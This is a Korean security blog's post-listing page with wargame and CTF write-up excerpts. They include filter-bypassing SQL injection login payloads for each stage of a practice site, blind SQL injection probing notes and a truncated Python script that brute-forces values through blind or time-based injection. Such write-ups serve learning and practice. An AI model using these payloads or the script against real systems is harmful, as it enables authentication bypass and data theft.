전체 글847 차세대 보안리더 양성 프로그램 (Best of the Best) 7월부터 시작하는 B.O.B 3기에 합격을 하게 되었습니다. 학교도 휴학할 예정이고 정말 이 분야에만 몰두할 수 있는 시간이 되겠네요. 2014. 6. 26. itchy's Funny injection 풀이 총 9단계로 이뤄진 간단한 SQL Injection 워게임 사이트이다. (http://itchy.dothome.co.kr) 단계별로 올라갈수록 필터링이 하나하나 추가되는 방식이며 아래의 페이로드 말고도 다른 방법들이 충분히 존재할 수 있으므로 시험끝나고 다시 한번 풀어봐야겠다. Stage 1. id=admin'%23&pw=a Stage 2. id에 # 와 -- 에 대한 필터링 추가) id=admin' or '=&pw=a Stage 3. id와 pw 모두 and 와 or 에 대한 필터링 추가) id=admin'||'=&pw=a Stage 4. id와 pw 모두 admin , 공백에 대한 필터링 추가) id=ad'%0d'min&pw='1=1%23 id='||id%0dlike%0d'adm%'/*&pw=*/%2.. 2014. 6. 18. Challenge 13 1000점이라는 높은 점수가 걸려있는 문제이다. 필터링이 많은것을 제외하고는 그리 어렵지 않은 문제였다. 일단 문제페이지에 접속해보면 HINT : select flag from prob13password 라는 힌트가 존재한다. prob13password 테이블에서 flag 를 추출해내는게 우리의 목표이다. 소스도 존재하지 않아 처음에는 감을 잡기 애매했다. 그러다가 Blind SQLi 라는 힌트를 얻게 되었고 공격을 시도하게 됬다. 일단 쿼리를 전송하는 부분이 어떠한 역할을 하는지 알아보기 위하여 아래와 같은 쿼리를 넣어봤다. ?no=1%0din(1) - 1 표시 ?no=1%0din(2) - 0 표시 (=가 필터링되므로 in 을 사용하였다.) 예상대로 참/거짓 판별유무를 표시하는듯하다. 처음에는 워게임 .. 2014. 6. 15. Python Blind,Time Based SQL Injection Source [GET] import httplibimport urllibresult=''length=1string="abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"for i in range(1,100): if(length '+string[j]print 'Password is '+result [POST] import httplibimport urllibresult=""length=1string="abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"for i in range(1,100): if(length=2: result=result+strin.. 2014. 6. 15. Challenge 57 후..시험기간이라 빠르게 풀고 다시 공부하려 했는데 대충대충 하는 습관때문에 하루종일 삽질을 하게 된 문제이다.. 소스부터 확인해보자. 2014. 6. 12. Challenge 45 ID 와 PW를 입력하여 로그인하는 간단한 폼이 존재한다. 소스를 확인해보자. 2014. 6. 12. 이전 1 ··· 112 113 114 115 116 117 118 ··· 142 다음